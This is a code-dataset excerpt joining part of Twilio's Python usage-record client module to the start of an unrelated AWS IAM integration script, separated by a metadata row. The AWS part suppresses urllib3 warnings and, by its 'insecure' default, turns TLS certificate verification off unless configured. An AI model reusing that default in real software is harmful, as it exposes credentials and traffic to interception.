:rtype: list[twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthInstance]
"""
limits = self._version.read_limits(limit, page_size)
page = self.page(
category=category,
start_date=start_date,
end_date=end_date,
include_subaccounts=include_subaccounts,
page_size=limits['page_size'],
)
return self._version.stream(page, limits['limit'], limits['page_limit'])
def list(self, category=values.unset, start_date=values.unset,
end_date=values.unset, include_subaccounts=values.unset, limit=None,
page_size=None):
"""
Lists ThisMonthInstance records from the API as a list.
Unlike stream(), this operation is eager and will load `limit` records into
memory before returning.
:param ThisMonthInstance.Category category: The usage category of the UsageRecord resources to read
:param date start_date: Only include usage that has occurred on or after this date
:param date end_date: Only include usage that occurred on or before this date
:param bool include_subaccounts: Whether to include usage from the master account and all its subaccounts
:param int limit: Upper limit for the number of records to return. list() guarantees
never to return more than limit. Default is no limit
:param int page_size: Number of records to fetch per request, when not set will use
the default value of 50 records. If no page_size is defined
but a limit is defined, list() will attempt to read the limit
with the most efficient page size, i.e. min(limit, 1000)
:returns: Generator that will yield up to limit results
:rtype: list[twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthInstance]
"""
return list(self.stream(
category=category,
start_date=start_date,
end_date=end_date,
include_subaccounts=include_subaccounts,
limit=limit,
page_size=page_size,
))
def page(self, category=values.unset, start_date=values.unset,
end_date=values.unset, include_subaccounts=values.unset,
page_token=values.unset, page_number=values.unset,
page_size=values.unset):
"""
Retrieve a single page of ThisMonthInstance records from the API.
Request is executed immediately
:param ThisMonthInstance.Category category: The usage category of the UsageRecord resources to read
:param date start_date: Only include usage that has occurred on or after this date
:param date end_date: Only include usage that occurred on or before this date
:param bool include_subaccounts: Whether to include usage from the master account and all its subaccounts
:param str page_token: PageToken provided by the API
:param int page_number: Page Number, this value is simply for client state
:param int page_size: Number of records to return, defaults to 50
:returns: Page of ThisMonthInstance
:rtype: twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthPage
"""
params = values.of({
'Category': category,
'StartDate': serialize.iso8601_date(start_date),
'EndDate': serialize.iso8601_date(end_date),
'IncludeSubaccounts': include_subaccounts,
'PageToken': page_token,
'Page': page_number,
'PageSize': page_size,
})
response = self._version.page(
'GET',
self._uri,
params=params,
)
return ThisMonthPage(self._version, response, self._solution)
def get_page(self, target_url):
"""
Retrieve a specific page of ThisMonthInstance records from the API.
Request is executed immediately
:param str target_url: API-generated URL for the requested results page
:returns: Page of ThisMonthInstance
:rtype: twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthPage
"""
response = self._version.domain.twilio.request(
'GET',
target_url,
)
return ThisMonthPage(self._version, response, self._solution)
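# Pagination sketch (editor's note, hedged): page()/get_page() can be driven
# manually when stream()/list() are not wanted; Page objects in this library
# are iterable and expose next_page().
# >>> page = this_month_list.page(page_size=50)
# >>> while page is not None:
# ...     for record in page:
# ...         handle(record)  # `handle` is a hypothetical callback
# ...     page = page.next_page()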
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.ThisMonthList>'
class ThisMonthPage(Page):
""" """
def __init__(self, version, response, solution):
"""
Initialize the ThisMonthPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:param account_sid: A 34 character string that uniquely identifies this resource.
:returns: twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthPage
:rtype: twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthPage
"""
super(ThisMonthPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of ThisMonthInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthInstance
:rtype: twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthInstance
"""
return ThisMonthInstance(self._version, payload, account_sid=self._solution['account_sid'], )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.ThisMonthPage>'
class ThisMonthInstance(InstanceResource):
""" """
class Category(object):
AGENT_CONFERENCE = "agent-conference"
ANSWERING_MACHINE_DETECTION = "answering-machine-detection"
AUTHY_AUTHENTICATIONS = "authy-authentications"
AUTHY_CALLS_OUTBOUND = "authy-calls-outbound"
AUTHY_MONTHLY_FEES = "authy-monthly-fees"
AUTHY_PHONE_INTELLIGENCE = "authy-phone-intelligence"
AUTHY_PHONE_VERIFICATIONS = "authy-phone-verifications"
AUTHY_SMS_OUTBOUND = "authy-sms-outbound"
CALL_PROGESS_EVENTS = "call-progess-events"
CALLERIDLOOKUPS = "calleridlookups"
CALLS = "calls"
CALLS_CLIENT = "calls-client"
CALLS_GLOBALCONFERENCE = "calls-globalconference"
CALLS_INBOUND = "calls-inbound"
CALLS_INBOUND_LOCAL = "calls-inbound-local"
CALLS_INBOUND_MOBILE = "calls-inbound-mobile"
CALLS_INBOUND_TOLLFREE = "calls-inbound-tollfree"
CALLS_OUTBOUND = "calls-outbound"
CALLS_PAY_VERB_TRANSACTIONS = "calls-pay-verb-transactions"
CALLS_RECORDINGS = "calls-recordings"
CALLS_SIP = "calls-sip"
CALLS_SIP_INBOUND = "calls-sip-inbound"
CALLS_SIP_OUTBOUND = "calls-sip-outbound"
CARRIER_LOOKUPS = "carrier-lookups"
CONVERSATIONS = "conversations"
CONVERSATIONS_API_REQUESTS = "conversations-api-requests"
CONVERSATIONS_CONVERSATION_EVENTS = "conversations-conversation-events"
CONVERSATIONS_ENDPOINT_CONNECTIVITY = "conversations-endpoint-connectivity"
CONVERSATIONS_EVENTS = "conversations-events"
CONVERSATIONS_PARTICIPANT_EVENTS = "conversations-participant-events"
CONVERSATIONS_PARTICIPANTS = "conversations-participants"
CPS = "cps"
FRAUD_LOOKUPS = "fraud-lookups"
GROUP_ROOMS = "group-rooms"
GROUP_ROOMS_DATA_TRACK = "group-rooms-data-track"
GROUP_ROOMS_ENCRYPTED_MEDIA_RECORDED = "group-rooms-encrypted-media-recorded"
GROUP_ROOMS_MEDIA_DOWNLOADED = "group-rooms-media-downloaded"
GROUP_ROOMS_MEDIA_RECORDED = "group-rooms-media-recorded"
GROUP_ROOMS_MEDIA_ROUTED = "group-rooms-media-routed"
GROUP_ROOMS_MEDIA_STORED = "group-rooms-media-stored"
GROUP_ROOMS_PARTICIPANT_MINUTES = "group-rooms-participant-minutes"
GROUP_ROOMS_RECORDED_MINUTES = "group-rooms-recorded-minutes"
IP_MESSAGING = "ip-messaging"
IP_MESSAGING_COMMANDS = "ip-messaging-commands"
IP_MESSAGING_DATA_STORAGE = "ip-messaging-data-storage"
IP_MESSAGING_DATA_TRANSFER = "ip-messaging-data-transfer"
IP_MESSAGING_ENDPOINT_CONNECTIVITY = "ip-messaging-endpoint-connectivity"
LOOKUPS = "lookups"
MARKETPLACE = "marketplace"
MARKETPLACE_ALGORITHMIA_NAMED_ENTITY_RECOGNITION = "marketplace-algorithmia-named-entity-recognition"
MARKETPLACE_DIGITAL_SEGMENT_BUSINESS_INFO = "marketplace-digital-segment-business-info"
MARKETPLACE_GOOGLE_SPEECH_TO_TEXT = "marketplace-google-speech-to-text"
MARKETPLACE_IBM_WATSON_MESSAGE_INSIGHTS = "marketplace-ibm-watson-message-insights"
MARKETPLACE_IBM_WATSON_MESSAGE_SENTIMENT = "marketplace-ibm-watson-message-sentiment"
MARKETPLACE_IBM_WATSON_RECORDING_ANALYSIS = "marketplace-ibm-watson-recording-analysis"
MARKETPLACE_ICEHOOK_SYSTEMS_SCOUT = "marketplace-icehook-systems-scout"
MARKETPLACE_INFOGROUP_DATAAXLE_BIZINFO = "marketplace-infogroup-dataaxle-bizinfo"
MARKETPLACE_CADENCE_TRANSCRIPTION = "marketplace-cadence-transcription"
MARKETPLACE_CADENCE_TRANSLATION = "marketplace-cadence-translation"
MARKETPLACE_CAPIO_SPEECH_TO_TEXT = "marketplace-capio-speech-to-text"
MARKETPLACE_FACEBOOK_OFFLINE_CONVERSIONS = "marketplace-facebook-offline-conversions"
MARKETPLACE_KEEN_IO_CONTACT_CENTER_ANALYTICS = "marketplace-keen-io-contact-center-analytics"
MARKETPLACE_MARCHEX_CLEANCALL = "marketplace-marchex-cleancall"
MARKETPLACE_MARCHEX_SENTIMENT_ANALYSIS_FOR_SMS = "marketplace-marchex-sentiment-analysis-for-sms"
MARKETPLACE_MARKETPLACE_NEXTCALLER_SOCIAL_ID = "marketplace-marketplace-nextcaller-social-id"
MARKETPLACE_MOBILE_COMMONS_OPT_OUT_CLASSIFIER = "marketplace-mobile-commons-opt-out-classifier"
MARKETPLACE_NEXIWAVE_VOICEMAIL_TO_TEXT = "marketplace-nexiwave-voicemail-to-text"
MARKETPLACE_NEXTCALLER_ADVANCED_CALLER_IDENTIFICATION = "marketplace-nextcaller-advanced-caller-identification"
MARKETPLACE_NOMOROBO_SPAM_SCORE = "marketplace-nomorobo-spam-score"
MARKETPLACE_PAYFONE_TCPA_COMPLIANCE = "marketplace-payfone-tcpa-compliance"
MARKETPLACE_TELO_OPENCNAM = "marketplace-telo-opencnam"
MARKETPLACE_TRUECNAM_TRUE_SPAM = "marketplace-truecnam-true-spam"
MARKETPLACE_TWILIO_CALLER_NAME_LOOKUP_US = "marketplace-twilio-caller-name-lookup-us"
MARKETPLACE_TWILIO_CARRIER_INFORMATION_LOOKUP = "marketplace-twilio-carrier-information-lookup"
MARKETPLACE_VOICEBASE_PCI = "marketplace-voicebase-pci"
MARKETPLACE_VOICEBASE_TRANSCRIPTION = "marketplace-voicebase-transcription"
MARKETPLACE_WHITEPAGES_PRO_CALLER_IDENTIFICATION = "marketplace-whitepages-pro-caller-identification"
MARKETPLACE_WHITEPAGES_PRO_PHONE_INTELLIGENCE = "marketplace-whitepages-pro-phone-intelligence"
MARKETPLACE_WHITEPAGES_PRO_PHONE_REPUTATION = "marketplace-whitepages-pro-phone-reputation"
MARKETPLACE_WOLFRAM_SHORT_ANSWER = "marketplace-wolfram-short-answer"
MARKETPLACE_WOLFARM_SPOKEN_RESULTS = "marketplace-wolfarm-spoken-results"
MARKETPLACE_DEEPGRAM_PHRASE_DETECTOR = "marketplace-deepgram-phrase-detector"
MARKETPLACE_CONVRIZA_ABABA = "marketplace-convriza-ababa"
MARKETPLACE_IBM_WATSON_TONE_ANALYZER = "marketplace-ibm-watson-tone-analyzer"
MARKETPLACE_REMEETING_AUTOMATIC_SPEECH_RECOGNITION = "marketplace-remeeting-automatic-speech-recognition"
MARKETPLACE_TCPA_DEFENSE_SOLUTIONS_BLACKLIST_FEED = "marketplace-tcpa-defense-solutions-blacklist-feed"
MARKETPLACE_VOICEBASE_TRANSCRIPTION_CUSTOM_VOCABULARY = "marketplace-voicebase-transcription-custom-vocabulary"
MARKETPLACE_YTICA_CONTACT_CENTER_REPORTING_ANALYTICS = "marketplace-ytica-contact-center-reporting-analytics"
MEDIASTORAGE = "mediastorage"
MMS = "mms"
MMS_INBOUND = "mms-inbound"
MMS_INBOUND_LONGCODE = "mms-inbound-longcode"
MMS_INBOUND_SHORTCODE = "mms-inbound-shortcode"
MMS_OUTBOUND = "mms-outbound"
MMS_OUTBOUND_LONGCODE = "mms-outbound-longcode"
MMS_OUTBOUND_SHORTCODE = "mms-outbound-shortcode"
MONITOR_READS = "monitor-reads"
MONITOR_STORAGE = "monitor-storage"
MONITOR_WRITES = "monitor-writes"
NOTIFY = "notify"
NOTIFY_ACTIONS_ATTEMPTS = "notify-actions-attempts"
NOTIFY_CHANNELS = "notify-channels"
NUMBER_FORMAT_LOOKUPS = "number-format-lookups"
PCHAT = "pchat"
PCHAT_ACTIONS = "pchat-actions"
PCHAT_APS = "pchat-aps"
PCHAT_NOTIFICATIONS = "pchat-notifications"
PCHAT_READS = "pchat-reads"
PCHAT_USERS = "pchat-users"
PCHAT_MESSAGES = "pchat-messages"
PEER_TO_PEER_ROOMS_PARTICIPANT_MINUTES = "peer-to-peer-rooms-participant-minutes"
PFAX = "pfax"
PFAX_MINUTES = "pfax-minutes"
PFAX_MINUTES_INBOUND = "pfax-minutes-inbound"
PFAX_MINUTES_OUTBOUND = "pfax-minutes-outbound"
PFAX_PAGES = "pfax-pages"
PHONENUMBERS = "phonenumbers"
PHONENUMBERS_CPS = "phonenumbers-cps"
PHONENUMBERS_EMERGENCY = "phonenumbers-emergency"
PHONENUMBERS_LOCAL = "phonenumbers-local"
PHONENUMBERS_MOBILE = "phonenumbers-mobile"
PHONENUMBERS_SETUPS = "phonenumbers-setups"
PHONENUMBERS_TOLLFREE = "phonenumbers-tollfree"
PREMIUMSUPPORT = "premiumsupport"
PROXY = "proxy"
PROXY_ACTIVE_SESSIONS = "proxy-active-sessions"
PV = "pv"
PV_COMPOSITION_MEDIA_DOWNLOADED = "pv-composition-media-downloaded"
PV_COMPOSITION_MEDIA_ENCRYPTED = "pv-composition-media-encrypted"
PV_COMPOSITION_MEDIA_STORED = "pv-composition-media-stored"
PV_COMPOSITION_MINUTES = "pv-composition-minutes"
PV_RECORDING_COMPOSITIONS = "pv-recording-compositions"
PV_ROOM_PARTICIPANTS = "pv-room-participants"
PV_ROOM_PARTICIPANTS_AU1 = "pv-room-participants-au1"
PV_ROOM_PARTICIPANTS_BR1 = "pv-room-participants-br1"
PV_ROOM_PARTICIPANTS_IE1 = "pv-room-participants-ie1"
PV_ROOM_PARTICIPANTS_JP1 = "pv-room-participants-jp1"
PV_ROOM_PARTICIPANTS_SG1 = "pv-room-participants-sg1"
PV_ROOM_PARTICIPANTS_US1 = "pv-room-participants-us1"
PV_ROOM_PARTICIPANTS_US2 = "pv-room-participants-us2"
PV_ROOMS = "pv-rooms"
PV_SIP_ENDPOINT_REGISTRATIONS = "pv-sip-endpoint-registrations"
RECORDINGS = "recordings"
RECORDINGSTORAGE = "recordingstorage"
ROOMS_GROUP_MINUTES = "rooms-group-minutes"
ROOMS_GROUP_BANDWIDTH = "rooms-group-bandwidth"
ROOMS_PEER_TO_PEER_MINUTES = "rooms-peer-to-peer-minutes"
SHORTCODES = "shortcodes"
SHORTCODES_CUSTOMEROWNED = "shortcodes-customerowned"
SHORTCODES_MMS_ENABLEMENT = "shortcodes-mms-enablement"
SHORTCODES_MPS = "shortcodes-mps"
SHORTCODES_RANDOM = "shortcodes-random"
SHORTCODES_UK = "shortcodes-uk"
SHORTCODES_VANITY = "shortcodes-vanity"
SMALL_GROUP_ROOMS = "small-group-rooms"
SMALL_GROUP_ROOMS_DATA_TRACK = "small-group-rooms-data-track"
SMALL_GROUP_ROOMS_PARTICIPANT_MINUTES = "small-group-rooms-participant-minutes"
SMS = "sms"
SMS_INBOUND = "sms-inbound"
SMS_INBOUND_LONGCODE = "sms-inbound-longcode"
SMS_INBOUND_SHORTCODE = "sms-inbound-shortcode"
SMS_OUTBOUND = "sms-outbound"
SMS_OUTBOUND_CONTENT_INSPECTION = "sms-outbound-content-inspection"
SMS_OUTBOUND_LONGCODE = "sms-outbound-longcode"
SMS_OUTBOUND_SHORTCODE = "sms-outbound-shortcode"
SMS_MESSAGES_FEATURES = "sms-messages-features"
SMS_MESSAGES_FEATURES_SENDERID = "sms-messages-features-senderid"
SPEECH_RECOGNITION = "speech-recognition"
STUDIO_ENGAGEMENTS = "studio-engagements"
SYNC = "sync"
SYNC_ACTIONS = "sync-actions"
SYNC_ENDPOINT_HOURS = "sync-endpoint-hours"
SYNC_ENDPOINT_HOURS_ABOVE_DAILY_CAP = "sync-endpoint-hours-above-daily-cap"
TASKROUTER_TASKS = "taskrouter-tasks"
TOTALPRICE = "totalprice"
TRANSCRIPTIONS = "transcriptions"
TRUNKING_CPS = "trunking-cps"
TRUNKING_EMERGENCY_CALLS = "trunking-emergency-calls"
TRUNKING_ORIGINATION = "trunking-origination"
TRUNKING_ORIGINATION_LOCAL = "trunking-origination-local"
TRUNKING_ORIGINATION_MOBILE = "trunking-origination-mobile"
TRUNKING_ORIGINATION_TOLLFREE = "trunking-origination-tollfree"
TRUNKING_RECORDINGS = "trunking-recordings"
TRUNKING_SECURE = "trunking-secure"
TRUNKING_TERMINATION = "trunking-termination"
TURNMEGABYTES = "turnmegabytes"
TURNMEGABYTES_AUSTRALIA = "turnmegabytes-australia"
TURNMEGABYTES_BRASIL = "turnmegabytes-brasil"
TURNMEGABYTES_GERMANY = "turnmegabytes-germany"
TURNMEGABYTES_INDIA = "turnmegabytes-india"
TURNMEGABYTES_IRELAND = "turnmegabytes-ireland"
TURNMEGABYTES_JAPAN = "turnmegabytes-japan"
TURNMEGABYTES_SINGAPORE = "turnmegabytes-singapore"
TURNMEGABYTES_USEAST = "turnmegabytes-useast"
TURNMEGABYTES_USWEST = "turnmegabytes-uswest"
TWILIO_INTERCONNECT = "twilio-interconnect"
VIDEO_RECORDINGS = "video-recordings"
VOICE_INSIGHTS = "voice-insights"
VOICE_INSIGHTS_CLIENT_INSIGHTS_ON_DEMAND_MINUTE = "voice-insights-client-insights-on-demand-minute"
VOICE_INSIGHTS_PTSN_INSIGHTS_ON_DEMAND_MINUTE = "voice-insights-ptsn-insights-on-demand-minute"
VOICE_INSIGHTS_SIP_INTERFACE_INSIGHTS_ON_DEMAND_MINUTE = "voice-insights-sip-interface-insights-on-demand-minute"
VOICE_INSIGHTS_SIP_TRUNKING_INSIGHTS_ON_DEMAND_MINUTE = "voice-insights-sip-trunking-insights-on-demand-minute"
WIRELESS = "wireless"
WIRELESS_ORDERS = "wireless-orders"
WIRELESS_ORDERS_ARTWORK = "wireless-orders-artwork"
WIRELESS_ORDERS_BULK = "wireless-orders-bulk"
WIRELESS_ORDERS_ESIM = "wireless-orders-esim"
WIRELESS_ORDERS_STARTER = "wireless-orders-starter"
WIRELESS_USAGE = "wireless-usage"
WIRELESS_USAGE_COMMANDS = "wireless-usage-commands"
WIRELESS_USAGE_COMMANDS_AFRICA = "wireless-usage-commands-africa"
WIRELESS_USAGE_COMMANDS_ASIA = "wireless-usage-commands-asia"
WIRELESS_USAGE_COMMANDS_CENTRALANDSOUTHAMERICA = "wireless-usage-commands-centralandsouthamerica"
WIRELESS_USAGE_COMMANDS_EUROPE = "wireless-usage-commands-europe"
WIRELESS_USAGE_COMMANDS_HOME = "wireless-usage-commands-home"
WIRELESS_USAGE_COMMANDS_NORTHAMERICA = "wireless-usage-commands-northamerica"
WIRELESS_USAGE_COMMANDS_OCEANIA = "wireless-usage-commands-oceania"
WIRELESS_USAGE_COMMANDS_ROAMING = "wireless-usage-commands-roaming"
WIRELESS_USAGE_DATA = "wireless-usage-data"
WIRELESS_USAGE_DATA_AFRICA = "wireless-usage-data-africa"
WIRELESS_USAGE_DATA_ASIA = "wireless-usage-data-asia"
WIRELESS_USAGE_DATA_CENTRALANDSOUTHAMERICA = "wireless-usage-data-centralandsouthamerica"
WIRELESS_USAGE_DATA_CUSTOM_ADDITIONALMB = "wireless-usage-data-custom-additionalmb"
WIRELESS_USAGE_DATA_CUSTOM_FIRST5MB = "wireless-usage-data-custom-first5mb"
WIRELESS_USAGE_DATA_DOMESTIC_ROAMING = "wireless-usage-data-domestic-roaming"
WIRELESS_USAGE_DATA_EUROPE = "wireless-usage-data-europe"
WIRELESS_USAGE_DATA_INDIVIDUAL_ADDITIONALGB = "wireless-usage-data-individual-additionalgb"
WIRELESS_USAGE_DATA_INDIVIDUAL_FIRSTGB = "wireless-usage-data-individual-firstgb"
WIRELESS_USAGE_DATA_INTERNATIONAL_ROAMING_CANADA = "wireless-usage-data-international-roaming-canada"
WIRELESS_USAGE_DATA_INTERNATIONAL_ROAMING_INDIA = "wireless-usage-data-international-roaming-india"
WIRELESS_USAGE_DATA_INTERNATIONAL_ROAMING_MEXICO = "wireless-usage-data-international-roaming-mexico"
WIRELESS_USAGE_DATA_NORTHAMERICA = "wireless-usage-data-northamerica"
WIRELESS_USAGE_DATA_OCEANIA = "wireless-usage-data-oceania"
WIRELESS_USAGE_DATA_POOLED = "wireless-usage-data-pooled"
WIRELESS_USAGE_DATA_POOLED_DOWNLINK = "wireless-usage-data-pooled-downlink"
WIRELESS_USAGE_DATA_POOLED_UPLINK = "wireless-usage-data-pooled-uplink"
WIRELESS_USAGE_MRC = "wireless-usage-mrc"
WIRELESS_USAGE_MRC_CUSTOM = "wireless-usage-mrc-custom"
WIRELESS_USAGE_MRC_INDIVIDUAL = "wireless-usage-mrc-individual"
WIRELESS_USAGE_MRC_POOLED = "wireless-usage-mrc-pooled"
WIRELESS_USAGE_MRC_SUSPENDED = "wireless-usage-mrc-suspended"
WIRELESS_USAGE_VOICE = "wireless-usage-voice"
WIRELESS_USAGE_SMS = "wireless-usage-sms"
def __init__(self, version, payload, account_sid):
"""
Initialize the ThisMonthInstance
:returns: twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthInstance
:rtype: twilio.rest.api.v2010.account.usage.record.this_month.ThisMonthInstance
"""
super(ThisMonthInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'account_sid': payload['account_sid'],
'api_version': payload['api_version'],
'as_of': payload['as_of'],
'category': payload['category'],
'count': payload['count'],
'count_unit': payload['count_unit'],
'description': payload['description'],
'end_date': deserialize.iso8601_date(payload['end_date']),
'price': deserialize.decimal(payload['price']),
'price_unit': payload['price_unit'],
'start_date': deserialize.iso8601_date(payload['start_date']),
'subresource_uris': payload['subresource_uris'],
'uri': payload['uri'],
'usage': payload['usage'],
'usage_unit': payload['usage_unit'],
}
# Context
self._context = None
self._solution = {'account_sid': account_sid, }
@property
def account_sid(self):
"""
:returns: The SID of the Account accrued the usage
:rtype: unicode
"""
return self._properties['account_sid']
@property
def api_version(self):
"""
:returns: The API version used to create the resource
:rtype: unicode
"""
return self._properties['api_version']
@property
def as_of(self):
"""
:returns: Usage records up to date as of this timestamp
:rtype: unicode
"""
return self._properties['as_of']
@property
def category(self):
"""
:returns: The category of usage
:rtype: ThisMonthInstance.Category
"""
return self._properties['category']
@property
def count(self):
"""
:returns: The number of usage events
:rtype: unicode
"""
return self._properties['count']
@property
def count_unit(self):
"""
:returns: The units in which count is measured
:rtype: unicode
"""
return self._properties['count_unit']
@property
def description(self):
"""
:returns: A plain-language description of the usage category
:rtype: unicode
"""
return self._properties['description']
@property
def end_date(self):
"""
:returns: The last date for which usage is included in the UsageRecord
:rtype: date
"""
return self._properties['end_date']
@property
def price(self):
"""
:returns: The total price of the usage
:rtype: unicode
"""
return self._properties['price']
@property
def price_unit(self):
"""
:returns: The currency in which `price` is measured
:rtype: unicode
"""
return self._properties['price_unit']
@property
def start_date(self):
"""
:returns: The first date for which usage is included in this UsageRecord
:rtype: date
"""
return self._properties['start_date']
@property
def subresource_uris(self):
"""
:returns: A list of related resources identified by their relative URIs
:rtype: unicode
"""
return self._properties['subresource_uris']
@property
def uri(self):
"""
:returns: The URI of the resource, relative to `https://api.twilio.com`
:rtype: unicode
"""
return self._properties['uri']
@property
def usage(self):
"""
:returns: The amount of usage
:rtype: unicode
"""
return self._properties['usage']
@property
def usage_unit(self):
"""
:returns: The units in which usage is measured
:rtype: unicode
"""
return self._properties['usage_unit']
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Api.V2010.ThisMonthInstance>'
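# Usage sketch (editor's note, hedged): with the top-level twilio Client this
# resource is typically reached as client.usage.records.this_month; the exact
# traversal may vary by library version.
# >>> from twilio.rest import Client
# >>> client = Client(account_sid, auth_token)
# >>> for record in client.usage.records.this_month.list(category='sms'):
# ...     print(record.category, record.usage, record.usage_unit)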
| 46.099349 | 121 | 0.68903 |
e480f22d663f86aaeb895426ef4c752196757569 | 43,199 | py | Python | Packs/AWS-IAM/Integrations/AWS-IAM/AWS-IAM.py | ryantoddtq/content | 50027658da7189e37e9514fc03057d1c1bc3209f | ["MIT"] | 2 | 2020-07-27T10:35:41.000Z | 2020-12-14T15:44:18.000Z | Packs/AWS-IAM/Integrations/AWS-IAM/AWS-IAM.py | Axonius/content | e058add82b7422338015cf14591512b9aad4d3e9 | ["MIT"] | 48 | 2022-03-08T13:45:00.000Z | 2022-03-31T14:32:05.000Z | Packs/AWS-IAM/Integrations/AWS-IAM/AWS-IAM.py | Axonius/content | e058add82b7422338015cf14591512b9aad4d3e9 | ["MIT"] | 1 | 2022-01-06T07:09:11.000Z | 2022-01-06T07:09:11.000Z | import demistomock as demisto
from CommonServerPython import *
from datetime import datetime, date
import boto3
from botocore.config import Config
from botocore.parsers import ResponseParserError
import urllib3.util
# Disable insecure warnings
urllib3.disable_warnings()
# Initiating params object for efficiency
params = demisto.params()
AWS_DEFAULT_REGION = None
AWS_ROLE_ARN = params.get('roleArn')
AWS_ROLE_SESSION_NAME = params.get('roleSessionName')
AWS_ROLE_SESSION_DURATION = params.get('sessionDuration')
AWS_ROLE_POLICY = None
AWS_ACCESS_KEY_ID = params.get('access_key')
AWS_SECRET_ACCESS_KEY = params.get('secret_key')
VERIFY_CERTIFICATE = not params.get('insecure', True)
proxies = handle_proxy(proxy_param_name='proxy', checkbox_default_value=False)
config = Config(
connect_timeout=1,
retries=dict(
max_attempts=5
),
proxies=proxies
)
def aws_session(service='iam', region=None, roleArn=None, roleSessionName=None,
roleSessionDuration=None,
rolePolicy=None):
kwargs = {}
if roleArn and roleSessionName is not None:
kwargs.update({
'RoleArn': roleArn,
'RoleSessionName': roleSessionName,
})
elif AWS_ROLE_ARN and AWS_ROLE_SESSION_NAME is not None:
kwargs.update({
'RoleArn': AWS_ROLE_ARN,
'RoleSessionName': AWS_ROLE_SESSION_NAME,
})
if roleSessionDuration is not None:
kwargs.update({'DurationSeconds': int(roleSessionDuration)})
elif AWS_ROLE_SESSION_DURATION is not None:
kwargs.update({'DurationSeconds': int(AWS_ROLE_SESSION_DURATION)})
if rolePolicy is not None:
kwargs.update({'Policy': rolePolicy})
elif AWS_ROLE_POLICY is not None:
kwargs.update({'Policy': AWS_ROLE_POLICY})
# No static access key configured: assume the role via the default credential chain.
# (The original nested `if not AWS_ACCESS_KEY_ID:` check was redundant and has been folded in.)
if kwargs and not AWS_ACCESS_KEY_ID:
sts_client = boto3.client('sts', config=config, verify=VERIFY_CERTIFICATE,
region_name=AWS_DEFAULT_REGION)
sts_response = sts_client.assume_role(**kwargs)
if region is not None:
client = boto3.client(
service_name=service,
region_name=region,
aws_access_key_id=sts_response['Credentials']['AccessKeyId'],
aws_secret_access_key=sts_response['Credentials']['SecretAccessKey'],
aws_session_token=sts_response['Credentials']['SessionToken'],
verify=VERIFY_CERTIFICATE,
config=config
)
else:
client = boto3.client(
service_name=service,
region_name=AWS_DEFAULT_REGION,
aws_access_key_id=sts_response['Credentials']['AccessKeyId'],
aws_secret_access_key=sts_response['Credentials']['SecretAccessKey'],
aws_session_token=sts_response['Credentials']['SessionToken'],
verify=VERIFY_CERTIFICATE,
config=config
)
elif AWS_ACCESS_KEY_ID and AWS_ROLE_ARN:
sts_client = boto3.client(
service_name='sts',
aws_access_key_id=AWS_ACCESS_KEY_ID,
aws_secret_access_key=AWS_SECRET_ACCESS_KEY,
verify=VERIFY_CERTIFICATE,
config=config
)
kwargs.update({
'RoleArn': AWS_ROLE_ARN,
'RoleSessionName': AWS_ROLE_SESSION_NAME,
})
sts_response = sts_client.assume_role(**kwargs)
client = boto3.client(
service_name=service,
region_name=AWS_DEFAULT_REGION,
aws_access_key_id=sts_response['Credentials']['AccessKeyId'],
aws_secret_access_key=sts_response['Credentials']['SecretAccessKey'],
aws_session_token=sts_response['Credentials']['SessionToken'],
verify=VERIFY_CERTIFICATE,
config=config
)
else:
if region is not None:
client = boto3.client(
service_name=service,
region_name=region,
aws_access_key_id=AWS_ACCESS_KEY_ID,
aws_secret_access_key=AWS_SECRET_ACCESS_KEY,
verify=VERIFY_CERTIFICATE,
config=config
)
else:
client = boto3.client(
service_name=service,
region_name=AWS_DEFAULT_REGION,
aws_access_key_id=AWS_ACCESS_KEY_ID,
aws_secret_access_key=AWS_SECRET_ACCESS_KEY,
verify=VERIFY_CERTIFICATE,
config=config
)
return client
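# Usage sketch (editor's note): every command handler below builds its client
# this way, threading any per-command role arguments through; for example:
# >>> client = aws_session(roleArn=args.get('roleArn'),
# ...                      roleSessionName=args.get('roleSessionName'))
# >>> client.list_users()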
class DatetimeEncoder(json.JSONEncoder):
# pylint: disable=method-hidden
def default(self, obj):
if isinstance(obj, datetime):
return obj.strftime('%Y-%m-%dT%H:%M:%S')
elif isinstance(obj, date):
return obj.strftime('%Y-%m-%d')
# Let the base class default method raise the TypeError
return json.JSONEncoder.default(self, obj)
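# Usage sketch (editor's note): passing this encoder to json.dumps lets boto3
# responses containing datetime/date objects serialize cleanly, e.g.
# raw = json.loads(json.dumps(response, cls=DatetimeEncoder))
# as done in list_roles and list_instance_profiles below.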
def create_user(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {'UserName': args.get('userName')}
if args.get('path'):
kwargs.update({'Path': args.get('path')})
response = client.create_user(**kwargs)
user = response['User']
data = ({
'UserName': user['UserName'],
'UserId': user['UserId'],
'Arn': user['Arn'],
'CreateDate': datetime.strftime(user['CreateDate'], '%Y-%m-%dT%H:%M:%S'),
'Path': user['Path'],
})
ec = {'AWS.IAM.Users': data}
human_readable = tableToMarkdown('AWS IAM Users', data)
return_outputs(human_readable, ec)
def create_login_profile(args):
client = aws_session(
roleArn=args.get('roleArn'),
roleSessionName=args.get('roleSessionName'),
roleSessionDuration=args.get('roleSessionDuration'),
)
kwargs = {
'UserName': args.get('userName'),
'Password': args.get('password')
}
if args.get('passwordResetRequired'):
kwargs.update({'PasswordResetRequired': True if args.get(
'passwordResetRequired') == 'True' else False})
response = client.create_login_profile(**kwargs)
if response['ResponseMetadata']['HTTPStatusCode'] == 200:
demisto.results("Login Profile Was Created For user {0} ".format(args.get('userName')))
def get_user(args):
client = aws_session(
